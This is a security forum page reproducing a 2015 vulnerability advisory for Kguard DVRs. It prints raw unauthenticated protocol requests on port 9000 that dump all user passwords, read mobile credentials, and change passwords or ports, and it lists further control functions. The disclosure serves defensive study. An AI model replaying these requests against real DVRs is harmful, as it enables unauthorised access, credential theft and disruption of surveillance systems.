Jump to content

Search the Community

Showing results for tags 'fjpfajardo'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10, 2015 PRODUCT DESCRIPTION The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical application. It's stylish & streamlines hardware design and excellent performance can be fast moving, competitive and an ideal solution for entry level & distribution channels. VENDOR REFERENCE: http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527 VULNERABILITY DESCRIPTION 1. Insufficient authentication and authorization A deficiency in handling authentication and authorization has been found with Kguard 104/108 models. While password-based authentication is used by the ActiveX component to protect the login page, all the communication to the application server at port 9000 allows data to be communicated directly with insufficient or improper authorization. The request HI_SRDK_SYS_USERMNG_GetUserList for example will show all the usernames in the system together with their passwords. The below example is an actual unmodified request and response by the server. REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0 CSeq:6 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:51 3Segment-Num:1 Segment-Seq:1 Data-Length:4 VMCTP/1.0 200 OK Content-Type:text/HDP CSeq:6 Return-Code:0 Content-Length:2326 Segment-Num:2 Segment-Seq:1 Data-Length:2240 eric 111222 111222 admin 111222 111222 333444 333444 555666 555666 user4 user5 user6 Segment-Seq:2 Data-Length:4 An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured, this allows mobile devices to access and monitor the cameras at port 18004. An actual unmodified request and response is shown below. REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0 CSeq:15 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:15 Segment-Num:0 VMCTP/1.0 200 OK Content-Type:text/HDP CSeq:15 Return-Code:0 Content-Length:161 Segment-Num:1 Segment-Seq:1 Data-Length:112 admin 111222 The password to this user can be changed easily by executing the HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below and can be saved in memory by executing HI_SRDK_DEV_SaveFlash: REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0 CSeq:1 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:161 Segment-Num:1 Segment-Seq:1 Data-Length:112 admin.t..|A<.......n(...........111222444.eted!.p.c<.... ... ...TF.............................................. The logs from the application server can confirm that the execution was successful: [MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!! /home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c 606======================== GetNetworkState:192.168.254.200 Logs from the DVR also shows that an existing mobile device that tries to connect on port 18004 with previous credentials stored will fail: < StreamingServer> [ run] A client(116) connected[2010-09-11 12:30]. < LangtaoCommProto> [ handlePacketBody] Input buffer total length: 60 < LangtaoCommProto> [ handlePacketBody] tlv type: 41 < LangtaoCommProto> [ handlePacketBody] tlv length: 56 < LangtaoCommProto> [ handlePacketBody] Login request received. < LangtaoCommProto> [ handleLoginReq] User Name: admin Passwrod: 111222 < LangtaoCommProto> [ handleLoginReq] User name and/or password validate fail. < StreamingServer> [ handleRequest2] Send response to client. < StreamingServer> [ handleRequest2] Session closed actively. < StreamingServer> [ run] Handle request fail. ----------------------- SESSION(116) END ----------------------- 2. Lack of transport security The communication to the application server is done by an unprotected ActiveX component that is presented to the browser's initial session. The lack of transport encryption may allow us to exploit possible request from this component to the application server. This file is named as HiDvrOcx.cab. Decompiling the file will allow us to see the libraries being used: -rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx -rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf -rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll -rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll Interestingly, checking the DLL file named HiDvrNet.dll will reveal other types of controls which can be presented to the application server as well: HI_SRDK_NET_MOBILE_GetOwspAttr HI_SRDK_NET_MOBILE_SetAttr HI_SRDK_NET_MOBILE_SetOwspAttr HI_SRDK_NET_Network_DHCP_Client_GetAttr HI_SRDK_NET_Network_DHCP_Client_SetAttr HI_SRDK_NET_Network_GetDNSList HI_SRDK_NET_Network_GetDefaultGateway HI_SRDK_NET_Network_GetNetdevAttr HI_SRDK_NET_Network_GetNetdevName HI_SRDK_NET_Network_SetDNSList HI_SRDK_NET_Network_SetDefaultGateway HI_SRDK_NET_Network_SetNetdevAttr HI_SRDK_NET_SetDdnsAttr HI_SRDK_NET_SetEmailAttr HI_SRDK_NET_SetIppreviewVodAttr HI_SRDK_NET_SetMctpServerPort HI_SRDK_NET_SetPppoeAttr HI_SRDK_NET_SetWebServerPort HI_SRDK_Open_Device HI_SRDK_RECORDER_GetPlaybackAttr HI_SRDK_RECORDER_GetRecordAttr HI_SRDK_RECORDER_GetRecordSchedule HI_SRDK_RECORDER_SetPlaybackAttr HI_SRDK_RECORDER_SetRecordAttr HI_SRDK_RECORDER_SetRecordSchedule HI_SRDK_SYS_GetDaylightAttr HI_SRDK_SYS_GetSysMaintainAttr HI_SRDK_SYS_GetSystemAttr HI_SRDK_SYS_SetDaylightAttr HI_SRDK_SYS_SetSysMaintainAttr HI_SRDK_SYS_SetSystemAttr HI_SRDK_SYS_USERMNG_AddGroup HI_SRDK_SYS_USERMNG_AddUser HI_SRDK_SYS_USERMNG_DelGroup HI_SRDK_SYS_USERMNG_DelUser HI_SRDK_SYS_USERMNG_Disable HI_SRDK_SYS_USERMNG_Enable HI_SRDK_SYS_USERMNG_GetAuthorityList HI_SRDK_SYS_USERMNG_GetGroupList HI_SRDK_SYS_USERMNG_GetUserList HI_SRDK_SYS_USERMNG_ModifyGroupInfo HI_SRDK_SYS_USERMNG_ModifyUserInfo 3. Denial of Service and Command Injection Input are not sanitized and filtered in some of the fields which may lead to a potential passive Denial of Service and/or command injection. By altering some requests such as HI_SRDK_NET_SetPppoeAttr, HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or HI_SRDK_NET_Network_SetDefaultGateway, a malicous user may be able to disrupt connectivity to the DVR. REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0 CSeq:58 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:49 1Segment-Num:1 Segment-Seq:1 Data-Length:2 REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0 CSeq:61 Accept:text/HDP Content-Type:text/HDP Func-Version:0x10 Content-Length:15 Segment-Num:0 The application server that listens for incoming requests at port 9000 is run by a binary called raysharp_dvr which suggest that the hardware manufacturer is Zhuhai RaySharp Technology Co. While the purpose for this vulnerability analysis is mainly for Kguard related DVR's, I believe that other devices that use the same firmware by the manufacturer and rebranded in the market are also vulnerable. 576 root 20696 S ./raysharp_dvr 577 root 20696 S ./raysharp_dvr 578 root 20696 S ./raysharp_dvr 579 root 20696 S ./raysharp_dvr 580 root 20696 S ./raysharp_dvr 581 root 20696 S ./raysharp_dvr 582 root 20696 S ./raysharp_dvr Timeline: 02/07/2015 - Discovery / PoC 02/09/2015 - Reported to vendor (NR) Source
×
×
  • Create New...